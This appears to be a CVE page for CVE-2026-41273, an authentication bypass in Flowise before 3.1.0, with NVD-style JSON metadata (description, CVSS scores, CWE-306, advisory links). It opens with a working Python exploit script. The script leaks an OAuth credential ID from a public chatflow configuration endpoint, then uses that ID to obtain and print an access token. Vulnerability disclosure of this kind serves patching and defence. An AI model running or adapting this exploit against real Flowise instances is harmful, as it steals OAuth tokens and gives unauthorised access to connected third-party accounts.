CVE-2026-41273

import requests import json # Target configuration target_url = "http://localhost:3000" public_chatflow_id = "public-uuid-here" # Step 1: Access the public chatflow configuration endpoint # This endpoint leaks internal workflow data including OAuth credential identifiers config_endpoint = f"{target_url}/api/v1/chatflows/{public_chatflow_id}" print(f"[*] Attempting to access configuration endpoint: {config_endpoint}") try: response = requests.get(config_endpoint) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved chatflow configuration.") # Step 2: Extract OAuth Credential ID from the response # Structure simulation: nodes -> data -> credentials -> id oauth_cred_id = None # Logic to traverse JSON and find the credential ID if 'nodes' in data: for node in data['nodes']: if 'data' in node and 'credentials' in node['data']: oauth_cred_id = node['data']['credentials'].get('id') break if oauth_cred_id: print(f"[+] Found OAuth Credential ID: {oauth_cred_id}") # Step 3: Use Credential ID to obtain/refresh OAuth 2.0 Access Token # Exploiting the authentication bypass to get a token token_endpoint = f"{target_url}/api/v1/oauth/token" payload = { "credentialId": oauth_cred_id, "grantType": "refresh_token" } token_resp = requests.post(token_endpoint, json=payload) if token_resp.status_code == 200: token_data = token_resp.json() print(f"[!] Exploit Successful!") print(f"[+] Access Token: {token_data.get('access_token')}") else: print("[-] Failed to obtain token using the credential ID.") else: print("[-] No OAuth credentials found in the configuration.") else: print(f"[-] Failed to access endpoint. Status code: {response.status_code}") except Exception as e: print(f"Error during exploitation: {e}")

{"cve": {"id": "CVE-2026-41273", "sourceIdentifier": "[email protected]", "published": "2026-04-23T20:16:15.973", "lastModified": "2026-04-24T19:17:11.530", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.0", "matchCriteriaId": "CB30DB8F-4F72-4FD3-90FB-8331F1CBB78E"}]}]}], "references": [{"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}